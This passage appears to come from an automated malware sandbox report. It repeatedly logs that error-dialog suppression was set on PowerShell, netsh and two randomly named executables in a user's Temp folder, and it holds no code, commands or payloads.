                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeProcess information set: NOOPENFILEERRORBOX
